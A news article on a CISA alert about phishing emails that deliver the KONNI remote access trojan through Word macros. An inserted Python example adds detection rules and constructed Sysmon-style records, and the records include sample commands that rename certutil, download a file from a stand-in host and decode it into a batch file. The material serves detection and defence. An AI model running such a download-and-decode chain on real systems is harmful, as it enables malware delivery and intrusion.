
CISA Alerts to Phishing Campaign Deploying KONNI RAT Malware

Hackers are leveraging a phishing campaign to deploy KONNI malware, a remote access trojan (RAT), to steal data, capture keystrokes, take screenshots, and launch cyberattacks.


By Jessica Davis

Hackers are using a phishing campaign to deploy KONNI malware, a remote access trojan (RAT), via Microsoft Word documents containing malicious Visual Basic for Applications (VBA) macro code, according to a recent Department of Homeland Security Cybersecurity and Infrastructure Security Agency (CISA) alert.

First observed in 2014, the malware has been linked to several campaigns tied to North Korea. There are also significant code overlaps with the NOKKI malware family and some evidence that links KONNI to the APT37 hacking group.

KONNI is typically delivered through spear-phishing campaigns, which are highly targeted and personal in comparison to traditional phishing attacks that focus more on volume. The targeted nature of the attack makes it difficult for even the most tech-savvy user to detect. 

According to the alert, KONNI's malicious code can change the document's font color from light grey to black in order to dupe the potential victim into enabling the content of the malicious attachment.

The code is also able to determine if the Windows operating system is a 32-bit or 64-bit version, while constructing and executing the command line to download additional files.

A successful KONNI deployment could enable a hacker to steal data, capture keystrokes, take screenshots, and launch malicious, arbitrary code. 

“Once the VBA macro constructs the command line, it uses the certificate database tool CertUtil to download remote files from a given Uniform Resource Locator,” CISA officials explained. “It also incorporates a built-in function to decode base64-encoded files.” 

“The Command Prompt silently copies certutil.exe into a temp directory and renames it to evade detection,” they added. “The cyber actor then downloads a text file from a remote resource containing a base64-encoded string that is decoded by CertUtil and saved as a batch (.BAT) file. Finally, the cyber actor deletes the text file from the temp directory and executes the .BAT file.” 
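The CertUtil chain CISA describes above (copy and rename certutil.exe into a temp directory, download a text file, base64-decode it into a .BAT file) gives defenders concrete process-creation signals to alert on. The following Python example is added here and is not part of the CISA alert or this article: it runs a handful of detection rules over constructed Sysmon-style process records (field names assumed to follow Sysmon Event ID 1: Image, OriginalFileName, CommandLine, ParentImage); the paths, user name and URL in the samples are made up.

```python
import re
from typing import Dict, List

# Constructed process-creation records in the shape of Sysmon Event ID 1 fields.
# Events 0-2 mimic the chain described in the alert; event 3 is benign certutil use.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "CommandLine": r"cmd /c copy C:\Windows\System32\certutil.exe C:\Users\u\AppData\Local\Temp\svc.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\svc.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"svc.exe -urlcache -split -f http://example.invalid/x.txt C:\Users\u\AppData\Local\Temp\x.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Users\u\AppData\Local\Temp\svc.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"svc.exe -decode C:\Users\u\AppData\Local\Temp\x.txt C:\Users\u\AppData\Local\Temp\x.bat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify C:\certs\corp-root.cer",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

# Legitimate locations of certutil.exe; anything else with CertUtil PE metadata is a rename.
SYSTEM_CERTUTIL = (r"c:\windows\system32\certutil.exe", r"c:\windows\syswow64\certutil.exe")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")
SHELLS = ("cmd.exe", "powershell.exe")


def certutil_findings(event: Dict[str, str]) -> List[str]:
    """Return the names of the rules a single process-creation record trips."""
    findings = []
    cmd = event["CommandLine"].lower()
    image = event["Image"].lower()
    parent = event.get("ParentImage", "").lower()
    is_certutil = event.get("OriginalFileName", "").lower() == "certutil.exe"
    # Rule 1: certutil.exe being copied/moved into a temp directory (staging for the rename).
    if re.search(r"\b(copy|xcopy|move)\b", cmd) and "certutil.exe" in cmd and "\\temp\\" in cmd:
        findings.append("certutil_copied_to_temp")
    # Rule 2: PE metadata says CertUtil but the binary runs from outside the system directories.
    if is_certutil and image not in SYSTEM_CERTUTIL:
        findings.append("renamed_certutil")
    # Rule 3: certutil used as a downloader (-urlcache) or base64 decoder (-decode).
    if is_certutil and "-urlcache" in cmd:
        findings.append("certutil_download")
    if is_certutil and "-decode" in cmd:
        findings.append("certutil_decode")
    # Rule 4: an Office process spawning a shell, the usual sign of a macro firing.
    if parent.endswith(OFFICE_APPS) and image.endswith(SHELLS):
        findings.append("office_spawned_shell")
    return findings


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (event index, rule name) pairs for every record that trips a rule."""
    return [(i, f) for i, ev in enumerate(events) for f in certutil_findings(ev)]
```

Rule 2 is the one that survives the rename, since it keys on the PE OriginalFileName rather than the on-disk name; Rule 3 alone would miss a renamed copy if the OriginalFileName field is not collected.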

KONNI is also able to collect the internet protocol address and usernames, delete files, create shortcuts to masquerade as legitimate files, and gather architecture data, connected drives, hostname, and computer name from the victim’s machine. 

The malware has also been observed using the File Transfer Protocol to exfiltrate reconnaissance data from the victim’s system. 

Notably, one version of KONNI can search for filenames created by previous versions of the malware, which suggests the hackers target the same victims repeatedly and that the versions may work together, according to MITRE.

The CISA alert provides administrators with detection signatures, as well as mitigation methods. Organizations are encouraged to follow best practices to strengthen their cyber posture, including maintaining up-to-date anti-virus signatures and engines. 

Patch management is crucial to preventing the exploitation of vulnerable systems, while file and printer sharing services should be disabled or protected with strong passwords or Active Directory authentication.

Users' permissions should be restricted so they cannot install or run unwanted software, and users should not be added to the local administrators group unless it is required for their role. Administrators must also ensure all software downloaded from the internet and all email attachments are scanned prior to opening.

Hackers have increasingly leveraged phishing attacks in recent months, with CISA recently alerting to a campaign designed to spoof the COVID-19 loan relief website. Researchers have also seen an increase in business email compromise phishing campaigns able to bypass multi-factor authentication and another scam targeting Microsoft Office 365 executive accounts. 

Healthcare organizations should review spear-phishing insights from Microsoft to better understand the attack method and prevention techniques.